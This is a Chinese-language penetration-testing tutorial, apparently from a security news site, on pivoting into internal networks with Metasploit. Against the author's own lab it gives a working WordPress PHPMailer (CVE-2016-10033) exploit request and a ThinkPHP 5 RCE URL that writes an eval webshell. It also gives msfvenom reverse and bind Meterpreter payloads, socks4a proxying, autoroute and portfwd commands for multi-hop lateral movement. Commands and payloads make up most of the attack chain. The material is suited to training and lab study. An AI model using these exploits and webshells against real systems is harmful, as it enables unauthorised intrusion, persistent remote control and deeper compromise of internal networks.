您当前的位置:首页 > 电脑百科 > 安全防护 > 网络安全

黑客必学知识点--”什么是内网穿透“详解

时间:2020-04-05 13:55:18  来源:  作者:
黑客必学知识点--”什么是内网穿透“详解

 

在平时护网比赛中,攻坚环境中,渗透测试中,做内网穿透使用的工具有很多如:EWCobalt Strike 为了方便小白入门,本次教程通过渗透过程中最常用的MSF攻击框架中socks4做内网穿透代理,实现内网横向渗透。

用本公司的靶场,模拟一个攻坚小场景:

外网IP:112.115.*.* (一台存在wordPress/ target=_blank class=infotextkey>WordPress漏洞的web服务器)

内网:10.0.0.0/24 (模拟开发人员,一台为weblogic漏洞机器,一台为thinkphp漏洞机器)

渗透思路:用MSF对wordpress漏洞进行反弹shell,发现机器位于一个内网,建立socks4线路,横向扫描并对内网其他机器进行渗透并反弹shell

由于socks4做穿透超过3层就会失去流量速度,所以后期我会写一篇用EW或其他穿透工具做多网段多层穿透。

攻击机:kali

目标机:攻坚靶场

首先开启kali,利用Wordpress 4.6 任意命令执行漏洞,对主站服务器进行上传一句话或,直接反弹shell(为了一些教会小白一些提权细节,所以先写入一句话,然后在反弹msf shell)如果自己练习,可以直接msf生成shellcode扔到主站反弹shell。

0x001 主站渗透

打开主站http://122.115.*.*:8000/介绍一下这个漏洞

黑客必学知识点--”什么是内网穿透“详解

 

WordPress <= 4.6命令执行漏洞(PHPMailer)(CVE-2016-10033)
WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress用作一个内容管理系统(CMS)来使用。WordPress使用PHPMailer组件向用户发送邮件。PHPMailer(版本<5.2.18)存在远程命令执行漏洞,攻击者只需轻松地构造出一个恶意邮箱地址,即可写入任意文件,从而造成远程命令执行的危害。

POC

假如目标地址为:http : //127.0.0.1 : 8000/

  1. 把下面的HTTP报文复制到BurpSuite Repeater中,单击Go按钮,填充目标IP和扩展(例如,IP填充127.0.0.1填充80)
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}vuln}} null)
Connection: close
User-Agent: Mozilla/5.0 (macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: Application/x-www-form-urlencoded
wp-submit=Get+New+Password&redirect_to=&user_login=admin
  1. 访问:http : //127.0.0.1 :8000/ vuln

看到返回状态码为200代表已经成功创建了/var/www/html/vuln文件

可在发包之前访问该地址,会出现404

注意:

  1. 远程URL中不要有 http://
  2. 所有字母必须小写
  3. 所有/用${substr{0}{1}{$spool_directory}}代替
  4. 空格所有用${substr{10}{1}{$tod_log}}代替

先利用poc对主站写入一个vuln空白页面,测试漏洞

黑客必学知识点--”什么是内网穿透“详解

 


黑客必学知识点--”什么是内网穿透“详解

 

然后写入一句话

黑客必学知识点--”什么是内网穿透“详解

 

用中国蚁剑连接webshell,下一步准备msf生成一个shell

黑客必学知识点--”什么是内网穿透“详解

 


黑客必学知识点--”什么是内网穿透“详解

 

linux系统下/var/tmp目录可以进行高权限反弹shell,打开新的一个终端输入"msfconsole"启动msf

黑客必学知识点--”什么是内网穿透“详解

 

新打开一个终端生成反弹shell命令

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
黑客必学知识点--”什么是内网穿透“详解

 

回到msf端口
msf>use exploit/multi/handler ###监听
msf>set payload linux/x86/meterpreter/reverse_tcp ###反弹shell模块
msf>run ###开始监听
黑客必学知识点--”什么是内网穿透“详解

 

用webshell把生成的shell.elf上传到/var/tmp/目录下,chmod+x 提权(linux提权细节),在通过终端执行反弹shell

黑客必学知识点--”什么是内网穿透“详解

 


黑客必学知识点--”什么是内网穿透“详解

 

反弹shell成功,开始内网穿透

黑客必学知识点--”什么是内网穿透“详解

 

meterpreter > ipconfig ###查看网卡ip
黑客必学知识点--”什么是内网穿透“详解

 

0x002 搭建内网隧道横向渗透

meterpreter中添加好通向对方内网的路由

meterpreter > run autoroute -s 10.0.0.0/24
meterpreter > route flush 不用的时候,记得删掉就行
黑客必学知识点--”什么是内网穿透“详解

 

由于目标是linux的,所以直接进行下一步
如果是windows跳板机可以用以下命令进行扫描内网机器
run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24 
windows:可以先通过arp扫描粗略的扫一眼目标内网的机器大概有多少

msf>background 挂后台保持shell,开始下一步开启代理

msf exploit(handler) > use auxiliary/server/socks4a 
msf auxiliary(socks4a) > set 127.0.0.1
msf auxiliary(socks4a) > set srvport 1080
msf auxiliary(socks4a) > run
黑客必学知识点--”什么是内网穿透“详解

 

然后apt install proxychains,我kali已经安装了所以直接

vim /etc/proxychains.conf
黑客必学知识点--”什么是内网穿透“详解

 

添加 socks4 127.0.0.1 1080

这样msf本地开启socks4穿透,通过shell,转发到跳板机的机器

proxychains nmap -sT -sV -Pn -n -p80 10.0.0.0/24 ###通过跳板机扫描内网
黑客必学知识点--”什么是内网穿透“详解

 

发现 10.0.0.0/24段有个几台活跃ip,新建终端:proxychains firefox ####通过代理打开火狐浏览器
黑客必学知识点--”什么是内网穿透“详解

 

通过web跳板机访问到10.0.0.3,但是问题来了,目标内网有一台漏洞主机10.0.0.3,但是用菜刀或者蚂剑无法直接连接,所以有两个办法:

1.通过proxy代理启动蚁剑或者菜刀 
2.目标机内网端口转发

使用portfwd模块(Metasploit中的一个post模块)可完成端口转发

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
 -L <opt> Forward: local host to listen on (optional). Remote: local host to connect to.
 -R Indicates a reverse port forward.
 -h Help banner.
 -i <opt> Index of the port forward entry to interact with (see the "list" command).
 -l <opt> Forward: local port to listen on. Reverse: local port to connect to.
 -p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
 -r <opt> Forward: remote host to connect to.

meterpreter > portfwd add -L 本地ip -l 本机端口 -p 目标内网端口 -r 目标内网

所以要建立一条线路用,msf 把本机某个端口直接转发到目标内网端口

攻击者本机<端口转发>>>>>跳板机>>>>>>目标机内网

黑客必学知识点--”什么是内网穿透“详解

 

现在无需任何代理,直接访问本机127.0.0.1:5000 就能访问到目标机内网

黑客必学知识点--”什么是内网穿透“详解

 

现在内网穿透拓扑结构就是

127.0.0.1:5000<>socks4:主站的shll<>内网10.0.0.3:80
 本地端口 socks4 内网
127.0.0.1:5000=10.0.0.3:80

0x003 多层跳板机穿透

现在对内网10.0.0.3进行渗透和提权,也就是127.0.0.1:5000

内网10.0.0.3是一台包含ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞的机器

直接访问http://your-ip/index.php?s=/Index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:
黑客必学知识点--”什么是内网穿透“详解

 

写入一句话shell就是

http://your-ip//index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3C?php%20@eval($_POST%5B-7%5D);?%3E

蚁剑连接shell:127.0.0.1:5000/shell.php

黑客必学知识点--”什么是内网穿透“详解

 

现在要对这台内网机器提权msfshell,由于是内网隔离环境,所以需要使用bind_shell

在msf生成一个bind_shell开端口木马启动后,在做本段端口转发过去,msf在bind连接

新起一个终端:msf生成一个bindshell的木马(正向连接)

 msfvenom -p linux/x86/meterpreter/bind_tcp lport=9999 -f elf -o bindshell

放到通过webshell 放到/var/tmp/下加权限,启动

黑客必学知识点--”什么是内网穿透“详解

 

现在内网10.0.0.3在9999端口开启直接连shell权限,现在要做一个新的转发把10.0.0.3:9999端口转发到本地,然后msf直连

黑客必学知识点--”什么是内网穿透“详解

 

sessions 
sessions id编号
meterpreter > portfwd add -L 127.0.0.1 -l 9999 -p 10.0.0.3 -r 9999
黑客必学知识点--”什么是内网穿透“详解

 

现在内网10.0.0.3的bindshell 9999 端口 转发到 本地127.0.0.1:9999端口了

msf进行直连shell

use exploit/multi/handler
set payload linux/x86/meterpreter/bind_tcp
show options
set LPORT 9999
set RHOST 127.0.0.1
run
黑客必学知识点--”什么是内网穿透“详解

 

等待连接shell

黑客必学知识点--”什么是内网穿透“详解

 

反弹shell后,只需要在10.0.0.3的shell上

use auxiliary/server/socks4a
set 127.0.0.1
set srvport 1081
run
添加一个新隧道

在/etc/proxychains.conf 中添加 socks4 127.0.0.1 1081

在proxychains nmap 扫描就是直接连接到10.0.0.3上进行转发扫描,内网二级穿透扫描

127.0.0.1:1080<>主站跳板跳板机<>10.0.0.3跳板机<>新ip(192.168.0.1)

实现了双跳板机内网穿透,同样方法,要是拿到192.168.0.1的第三层内网,只需要之前的添加个端口转发到本地,就能继续渗透。一般内网到第二层流量很少了,继续深层网段渗透就需要上 EW穿透神器等工具。

总结一下流程,拿到webshell,上传木马反弹的msf,msf做socks4的代理然后添加端口转发,进行下一层渗透,第二层同样继续反弹shell,做代理,端口转发。



Tags:内网穿透   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
# 1. nps-npc1.1 简介nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh...【详细内容】
2021-12-22  Tags: 内网穿透  点击:(8)  评论:(0)  加入收藏
FRP 内网穿透需求背景最近小王公司接个对接公众账号应用开发的项目,其中有个功能需求是"用户关注公众账号后发送特定消息后公众账号需要回复一个二维码海报“。了解需求后,便...【详细内容】
2021-09-22  Tags: 内网穿透  点击:(52)  评论:(0)  加入收藏
1. 前言大家好,我是安果!一提到远程桌面,可能大家都会想到 TeamViewer、向日葵等第三方软件但是,它们大多是商业化软件,价格昂贵;即使有提供免费版本,也是各种限制,稳定性和安全性...【详细内容】
2021-09-16  Tags: 内网穿透  点击:(72)  评论:(0)  加入收藏
本文使用 docker 方式部署, 使用 windows 客户端首先 拉取镜像docker pull ffdfgdfg/nps下载 conf文件夹 并解压,或前往项目主页自行下载项目首页: https://ehang-io.github.i...【详细内容】
2021-07-14  Tags: 内网穿透  点击:(184)  评论:(0)  加入收藏
钉钉美图前言最近有一个小需求【调试远程python代码,超方便pycharm教程】需要用到内网穿透,然后自己搜到了【最强内网穿透工具frp】。然后看网友评论里面有推荐【傻瓜式-Web面...【详细内容】
2021-06-18  Tags: 内网穿透  点击:(1702)  评论:(0)  加入收藏
很多开发者在开发个人项目的前期,可能都会遇到没有公网域名或者公网IP,导致调试受限的问题。虽然,购买一个服务器,注册一个域名,很便宜,也很简单,但是如果能通过免费的内网穿透工具...【详细内容】
2021-05-25  Tags: 内网穿透  点击:(182)  评论:(0)  加入收藏
一、工具介绍Chisel可用来搭建内网隧道,类似于我们常用的花生壳和ngrok。由于目前使用的人比较少,因此对于有些杀软还不能准确的识别出该工具。chisel可以进行端口转发、反向...【详细内容】
2021-04-02  Tags: 内网穿透  点击:(311)  评论:(0)  加入收藏
今天给大家出个外网访问内网畅捷通软件的教程。相信大家都知道,在没有公网ip的情况下,我们是没办法在外网访问内网的应用的;这时候应该怎么办?我们今天就用闪库内网穿透来解决这...【详细内容】
2020-11-23  Tags: 内网穿透  点击:(134)  评论:(0)  加入收藏
测试系统: 外网:linux 内网:windows python:python3.6(需要安装flask、psutil) 功能介绍:使用flask,实现可一键添加端口映射,可以删除单端口,可删除全部端口映射需要准备的东西: 1:如上...【详细内容】
2020-10-07  Tags: 内网穿透  点击:(196)  评论:(0)  加入收藏
Bullet 是一款基于 Java 实现,通过 WebSocket 实现 Bullet 协议反向控制 ngrok 的 web 管理化工具。项目完全开源免费,可独立部署。平台提供了 server 服务,可满足短期的内网穿...【详细内容】
2020-09-30  Tags: 内网穿透  点击:(175)  评论:(0)  加入收藏
▌简易百科推荐
(报告出品方:德勤)数字化转型网络安全及转型挑战在任何行业,保持竞争力都需要快速开发新产品和 服务并推向市场。创新型业务模式不仅仅是简单地将现有 流程数字化,其正在覆盖供应...【详细内容】
2021-12-22  认是    Tags:网络安全   点击:(29)  评论:(0)  加入收藏
10月18号, W3C中网络平台孵化器小组(Web Platform Incubator Community Group)公布了HTML Sanitizer API的规范草案。这份草案用来解决浏览器如何解决XSS攻击问题。 网络安全中...【详细内容】
2021-12-07  实战Java  博客园  Tags:脚本攻击   点击:(20)  评论:(0)  加入收藏
一、背景介绍大家在Linux的日常使用中都晓得如何通过命令行去配置Linux的端口开放规则,但是大家知道如何配置Windows入站出站规则吗?有哪些常见的危险端口呢?如何解决上述问题...【详细内容】
2021-12-01  Kali与编程    Tags:防火墙   点击:(30)  评论:(0)  加入收藏
网络安全服务商Randori公司日前发布了一份调查报告,列出了网络攻击者最有可能攻击或利用的IT资产。在遭遇Solarwinds黑客攻击一周年之际,以及在网络安全(尤其是勒索软件和供应...【详细内容】
2021-10-28  企业网D1net   企鹅号  Tags:网络攻击   点击:(57)  评论:(0)  加入收藏
0x01.背景实验利用Dns Administrators 组成员,通过远程配置Dns服务,进行Dll inject从而实现特权提升。 在域内,Dns server 通常为Dc Server,Dns服务器管理基于rpc,通过调用c:\wi...【详细内容】
2021-10-22  IT影子    Tags:特权提升   点击:(37)  评论:(0)  加入收藏
本文主要介绍和总结了CSRF跨站请求伪造的基本原理和主要防范措施,工作中有用到的朋友不妨收藏转发一下,以备您参考。什么是CSRF?CSRF跨站点请求伪造(Cross&mdash;Site Request...【详细内容】
2021-10-13  快乐中恒    Tags:CSRF   点击:(49)  评论:(0)  加入收藏
waf拦截在打某市 Hvv 第一天就找到一个文件上传的点,经过测试,可以直接任意文件上传,没有什么道理。 直接尝试上传 Php 文件,被 waf 拦截了 2021最新整理网络安全/渗透测试/安...【详细内容】
2021-10-11  KaliMa    Tags:防火墙   点击:(56)  评论:(0)  加入收藏
应用程序与文件系统的交互始终是高度安全敏感的,因为较小的功能漏洞很容易成为可利用漏洞的来源。这种观察在web文件管理器的情况下尤其正确,其作用是复制完整文件系统的功能...【详细内容】
2021-09-17  IT野涵    Tags:漏洞链   点击:(56)  评论:(0)  加入收藏
您的苹果手机尽管iPhone比Android更安全,但也可以通过各种方式入侵。避免黑客入侵的最佳方法是警惕奇怪的链接或粗略的应用程序,并仅在必要时提供信息。电池寿命差和性能低下...【详细内容】
2021-09-16  Hackers爱好者    Tags:黑客入侵   点击:(633)  评论:(0)  加入收藏
防火墙一般布置在逻辑区域的入口处,位于三层网络架构的核心和汇聚之间,起到隔离逻辑区域,为逻辑区域创建安全策略的作用。 上面就是应用区的防火墙布置方式,他布置在应用区,可以...【详细内容】
2021-09-03  知来知去    Tags:主备模式防火墙   点击:(109)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条